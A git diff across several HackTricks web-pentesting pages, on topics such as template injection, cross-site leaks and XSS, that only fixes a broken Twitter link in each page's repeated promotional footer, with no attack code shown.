repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -320,7 +320,7 @@ Check the following page: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md index 3df6523f0..ebc5aad60 100644 --- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md +++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -265,7 +265,7 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https:// * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xs-search/connection-pool-by-destination-example.md b/pentesting-web/xs-search/connection-pool-by-destination-example.md index c7149e9af..17a7ed36b 100644 --- a/pentesting-web/xs-search/connection-pool-by-destination-example.md +++ b/pentesting-web/xs-search/connection-pool-by-destination-example.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -129,7 +129,7 @@ Tbh, reading the script I missed some part where the **attacker makes the bot lo * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md index 5d0beba90..cb412d4db 100644 --- a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md +++ b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -76,7 +76,7 @@ The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/e * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md index 14545d16c..c14ccbbfd 100644 --- a/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md +++ b/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -159,7 +159,7 @@ Let's check the code: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/xs-search/javascript-execution-xs-leak.md b/pentesting-web/xs-search/javascript-execution-xs-leak.md index a2111d72f..f0ff45413 100644 --- a/pentesting-web/xs-search/javascript-execution-xs-leak.md +++ b/pentesting-web/xs-search/javascript-execution-xs-leak.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -86,7 +86,7 @@ Main page that generates iframes to the previous `/guessing` page to test each p * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/pentesting-web/xs-search/performance.now-+-force-heavy-task.md index 4f14b756c..3a41bdafe 100644 --- a/pentesting-web/xs-search/performance.now-+-force-heavy-task.md +++ b/pentesting-web/xs-search/performance.now-+-force-heavy-task.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -125,7 +125,7 @@ Initially, I didn’t set object width and height, but later on, I found that it * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xs-search/performance.now-example.md b/pentesting-web/xs-search/performance.now-example.md index d7379da7e..8de621591 100644 --- a/pentesting-web/xs-search/performance.now-example.md +++ b/pentesting-web/xs-search/performance.now-example.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -63,7 +63,7 @@ document.addEventListener('DOMContentLoaded', main); * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xs-search/url-max-length-client-side.md b/pentesting-web/xs-search/url-max-length-client-side.md index 020cbe153..4081db979 100644 --- a/pentesting-web/xs-search/url-max-length-client-side.md +++ b/pentesting-web/xs-search/url-max-length-client-side.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -89,7 +89,7 @@ if __name__ == '__main__': * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md index ded8c82d7..dcba6fe34 100644 --- a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md +++ b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -450,7 +450,7 @@ version="1.0"> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md index 1425345bf..788f6f956 100644 --- a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md +++ b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md @@ -9,7 +9,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -137,7 +137,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord 